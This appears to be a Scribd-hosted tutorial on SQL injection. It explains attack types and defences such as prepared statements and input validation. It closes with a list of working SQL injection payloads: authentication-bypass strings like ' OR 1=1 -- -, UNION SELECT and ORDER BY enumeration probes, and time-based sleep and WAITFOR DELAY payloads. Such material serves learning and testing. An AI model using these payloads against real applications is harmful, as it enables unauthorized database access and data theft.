Scribd Logo
Upload

Welcome to Scribd!

  • SQL Injection

    Uploaded by

    a
    14 views6 pages
    ghjgfxcv

    Original Title

    SQL injection

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    ghjgfxcv

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    14 views6 pages

    SQL Injection

    Uploaded by

    a
    ghjgfxcv

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 6

    SQL injection (SQLi)

    is a cyberattack that injects malicious SQL code into an application, allowing the attacker to view or
    modify a database.

    Consequences of a Successful SQL Injection Attack


    SQL injection attacks can have a significant negative impact on an organization. Organizations have
    access to sensitive company data and private customer information, and SQL injection attacks often
    target that confidential information. When a malicious user successfully completes an SQL injection
    attack, it can have any of the following impacts:

    Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks
    exposing sensitive company data stored on the SQL server.

    Compromise Users’ Privacy: Depending on the data stored on the SQL server, an attack can expose
    private user data, such as credit card numbers.

    Give an attacker administrative access to your system: If a database user has administrative privileges,
    an attacker can gain access to the system using malicious code. To protect against this kind of
    vulnerability, create a database user with the least possible privileges.

    Give an Attacker General Access to Your System: If you use weak SQL commands to check user names
    and passwords, an attacker could gain access to your system without knowing a user’s credentials. With
    general access to your system, an attacker can cause additional damage accessing and manipulating
    sensitive information.

    Compromise the Integrity of Your Data: Using SQL injection, attackers can make changes to or delete
    information from your system.

    3 Types of SQL Injection


    1. In-band SQL Injection
    In-band SQL injection is the most common type of attack. With this type of SQL injection attack, a
    malicious user uses the same communication channel for the attack and to gather results. The following
    techniques are the most common types of in-band SQL injection attacks:

    Error-based SQL injection: With this technique, attackers gain information about the database
    structure when they use a SQL command to generate an error message from the database server. Error
    messages are useful when developing a web application or web page, but they can be a vulnerability
    later because they expose information about the database. To prevent this vulnerability, you can disable
    error messages after a website or application is live.

    2. Inferential SQL Injection


    Inferential SQL injection is also called blind SQL injection because the website database doesn’t transfer
    data to the attacker like with in-band SQL injection. Instead, a malicious user can learn about the
    structure of the server by sending data payloads and observing the response. Inferential SQL injection
    attacks are less common than in-band SQL injection attacks because they can take longer to complete.
    The two types of inferential SQL injection attacks use the following techniques:

    Boolean injection: With this technique, attackers send a SQL query to the database and observe the
    result. Attackers can infer if a result is true or false based on whether the information in the HTTP
    response was modified.

    Time-based injection: With this technique, attackers send a SQL query to the database, making the
    database wait a specific number of seconds before responding. Attackers can determine if the result is
    true or false based on the number of seconds that elapses before a response. For example, a hacker
    could use a SQL query that commands a delay if the first letter of the first database’s name is A. Then, if
    the response is delayed, the attacker knows the query is true.

    3. Out-of-Band SQL Injection


    Out-of-band SQL injection is the least common type of attack. With this type of SQL injection attack,
    malicious users use a different communication channel for the attack than they use to gather results.
    Attackers use this method if a server is too slow or unstable to use inferential SQL injection or in-band
    SQL injection.

    How to Prevent SQL Injection


    1. Use Stored Procedure, Not Dynamic SQL
    Consider our earlier dynamic SQL example. In the images below, you can see what it
    looks like after a user executes SQL injection in the login form. Notice that the fourth
    statement will be ignored since the “–” syntax disables any succeeding commands, while
    the third always returns “true.” This results in a successful login, even if the username
    and password are incorrect (see Images 1.1 and 1.2).
    2. Use Prepared Statements
    Prepared Statements (PS) are pre-compiled SQL commands created inside a program that can
    be used many times over the course of the application’s lifecycle. By default, PS input
    parameters are binded. Binded parameters are treated as plain text values, which prevents any
    command alteration during an SQL injection attack. Consider the example in Image 2.1: A PS
    variation of the dynamic SQL query introduced earlier maintains the intended login behavior
    despite the SQL injection parameters in Image 2.2. Image 2.3 shows the resulting SQL command
    after the input parameters and PS were binded. This will not cause any unexpected SQL results
    or program outcomes.

    3.Input Validation
    Validating input plays a significant role in preventing SQL injection. Suspicious inputs are filtered
    prior to submission or processing by the server when validated. An example of input validation
    is an email validator. There are two types of validation: server side and client side.

    Generic SQL Injection Payloads


    '

    ''

    ``

    "
    ""

    //

    \\

    ' or "

    -- or #

    ' OR '1

    ' OR 1 -- -

    " OR "" = "

    " OR 1 = 1 -- -

    ' OR '' = '

    '='

    'LIKE'

    '=0--+

    OR 1=1

    ' OR 'x'='x

    ' AND id IS NULL; --

    '''''''''''''UNION SELECT '2

    %00

    /*…*/

    + addition, concatenate (or space in url)

    || (double pipe) concatenate

    % wildcard attribute indicator

    @variable local variable

    @@variable global variable


    # Numeric

    AND 1

    AND 0

    AND true

    AND false

    1-false

    1-true

    1*56

    -2

    1' ORDER BY 1--+

    1' ORDER BY 2--+

    1' ORDER BY 3--+

    1' ORDER BY 1,2--+

    1' ORDER BY 1,2,3--+

    1' GROUP BY 1,2,--+

    1' GROUP BY 1,2,3--+

    ' GROUP BY columnnames having 1=1 --

    -1' UNION SELECT 1,2,3--+

    ' UNION SELECT sum(columnname ) from tablename --

    -1 UNION SELECT 1 INTO @,@


    -1 UNION SELECT 1 INTO @,@,@

    1 AND (SELECT * FROM Users) = 1

    ' AND MID(VERSION(),1,1) = '5';

    ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

    Finding the table name

    Time-Based:

    ,(select * from (select(sleep(10)))a)

    %2c(select%20*%20from%20(select(sleep(10)))a)

    ';WAITFOR DELAY '0:0:30'--

    Comments:

    # Hash comment

    /* C-style comment

    -- - SQL comment

    ;%00 Nullbyte

    ` Backtick

    You might also like